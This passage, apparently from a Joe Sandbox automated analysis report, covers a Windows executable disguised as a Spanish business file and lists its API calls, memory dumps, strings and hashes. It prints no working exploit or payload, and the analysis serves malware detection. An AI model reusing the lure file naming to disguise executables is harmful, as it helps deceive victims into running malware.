                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,758E3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406509
                                                • CharNextW.USER32(?,?,?,00000000), ref: 00406518
                                                • CharNextW.USER32(?,00000000,758E3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 0040651D
                                                • CharPrevW.USER32(?,?,758E3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406530
                                                Strings
                                                • *?|<>/":, xrefs: 004064F8
                                                • "C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe", xrefs: 004064A6
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004064A7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: "C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 589700163-609424192
                                                • Opcode ID: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
                                                • Instruction ID: 798f9d5398cbdb919d0ccd284a00eb8243013f3251525297edaf214bcc17b89f
                                                • Opcode Fuzzy Hash: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
                                                • Instruction Fuzzy Hash: 30110815801612A5D7307B149C40AB776E8EFA5764F52803FEC8A733C5E77C5CA286AD
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040435A
                                                • GetSysColor.USER32(00000000), ref: 00404376
                                                • SetTextColor.GDI32(?,00000000), ref: 00404382
                                                • SetBkMode.GDI32(?,?), ref: 0040438E
                                                • GetSysColor.USER32(?), ref: 004043A1
                                                • SetBkColor.GDI32(?,?), ref: 004043B1
                                                • DeleteObject.GDI32(?), ref: 004043CB
                                                • CreateBrushIndirect.GDI32(?), ref: 004043D5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                • Instruction ID: f1e38b434243e48c2b46a4a8fcf45a1f38fac15713e13bd475e5664ee3236b4b
                                                • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                • Instruction Fuzzy Hash: F0215171600704ABCB219F68DD48B5BBBF8AF41714F04892DEDD5E26E0D778E904CB54
                                                APIs
                                                • DestroyWindow.USER32(00000000,00000000), ref: 00402E4E
                                                • GetTickCount.KERNEL32 ref: 00402E6C
                                                • wsprintfW.USER32 ref: 00402E9A
                                                  • Part of subcall function 00405371: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                  • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                  • Part of subcall function 00405371: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,00402EAD,00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,00000000,00000000,00000000), ref: 004053CC
                                                  • Part of subcall function 00405371: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll), ref: 004053DE
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                • CreateDialogParamW.USER32(0000006F,00000000,00402D98,00000000), ref: 00402EBE
                                                • ShowWindow.USER32(00000000,00000005), ref: 00402ECC
                                                  • Part of subcall function 00402E17: MulDiv.KERNEL32(0004218B,00000064,00043FCA), ref: 00402E2C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                • String ID: ... %d%%
                                                • API String ID: 722711167-2449383134
                                                • Opcode ID: 68327632d04469364c1974b45a761d3b68d751ecd12d8829f1a69e2ac19d740d
                                                • Instruction ID: 8dd11ec53df0ba6bdd92dbd1cf8f77c56262218af4b431f1c1abafb00f700e94
                                                • Opcode Fuzzy Hash: 68327632d04469364c1974b45a761d3b68d751ecd12d8829f1a69e2ac19d740d
                                                • Instruction Fuzzy Hash: FB016570541614DBC7216B50EE0DA9B7B58AB00B45B14413FF941F12D1DBF844A58BEE
                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C56
                                                • GetMessagePos.USER32 ref: 00404C5E
                                                • ScreenToClient.USER32(?,?), ref: 00404C78
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C8A
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404CB0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                • Instruction ID: 3ec40d72beee944c7b32a6f5f5203a90e51618c2e0ef94a62ef03edc632050ca
                                                • Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                • Instruction Fuzzy Hash: 88015271901218BAEB10DF94DD45FFEBBBCAF58711F10012BBA51B61C0C7B499018B95
                                                APIs
                                                • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402DB6
                                                • wsprintfW.USER32 ref: 00402DEA
                                                • SetWindowTextW.USER32(?,?), ref: 00402DFA
                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E0C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                • API String ID: 1451636040-1158693248
                                                • Opcode ID: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
                                                • Instruction ID: 5b31381c318dcc107e486aeb82f0cbc8ffe93b2faae57e60c2f54a212ea49e40
                                                • Opcode Fuzzy Hash: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
                                                • Instruction Fuzzy Hash: 53F0367154020CABDF245F50DD49BEA3B69FB44304F00803AFA05B51D0DBB959658B99
                                                APIs
                                                • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                  • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2987306905.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2987274852.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2987339691.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2987366231.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                • String ID:
                                                • API String ID: 4216380887-0
                                                • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                APIs
                                                  • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                • GlobalFree.KERNEL32(?), ref: 10002572
                                                • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2987306905.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2987274852.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2987339691.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2987366231.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402917
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402933
                                                • GlobalFree.KERNEL32(?), ref: 0040296C
                                                • GlobalFree.KERNEL32(00000000), ref: 0040297F
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402997
                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 004029AB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                • String ID:
                                                • API String ID: 2667972263-0
                                                • Opcode ID: 364cdaa611351f703cd1bca6674fb989e6e16abe5aa745253ea670e3687e1c0d
                                                • Instruction ID: 8996c306b55a9cd0cf00445349fd93af405541c9de08eca1dd931963291c836b
                                                • Opcode Fuzzy Hash: 364cdaa611351f703cd1bca6674fb989e6e16abe5aa745253ea670e3687e1c0d
                                                • Instruction Fuzzy Hash: C221BF71800124BBDF116FA5CE49D9E7E79EF09364F10423EF8507A2E0CB794D418B98
                                                APIs
                                                • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404BCE
                                                • wsprintfW.USER32 ref: 00404BD7
                                                • SetDlgItemTextW.USER32(?,00423728), ref: 00404BEA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s$(7B
                                                • API String ID: 3540041739-1320723960
                                                • Opcode ID: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
                                                • Instruction ID: 06844f863ebb5207f96fa0dde493c575b08da8a3ff5d6269356cbccd3d727cca
                                                • Opcode Fuzzy Hash: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
                                                • Instruction Fuzzy Hash: E211D873A0412877DB00666D9C41F9E32989B85374F150237FA25F31D1DA79D81282E9
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2987306905.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2987274852.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2987339691.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2987366231.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                • String ID:
                                                • API String ID: 1148316912-0
                                                • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                APIs
                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403437,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405BCC
                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403437,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405BD6
                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405BE8
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2659869361-3355392842
                                                • Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                • Instruction ID: 65d0506ad812cb1a76e9921ecf3bea8c464967d5314b17a54056b3388df28152
                                                • Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                • Instruction Fuzzy Hash: 41D05E31101535AAC2117B44AC04CDB66AC9E46304342487EF541B60A9C77C696296EE
                                                APIs
                                                • CloseHandle.KERNEL32(000002D0,C:\Users\user\AppData\Local\Temp\,0040379C,?), ref: 0040397B
                                                • CloseHandle.KERNEL32(000002C0,C:\Users\user\AppData\Local\Temp\,0040379C,?), ref: 0040398F
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040396E
                                                • C:\Users\user\AppData\Local\Temp\nsz2C67.tmp, xrefs: 0040399F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: CloseHandle
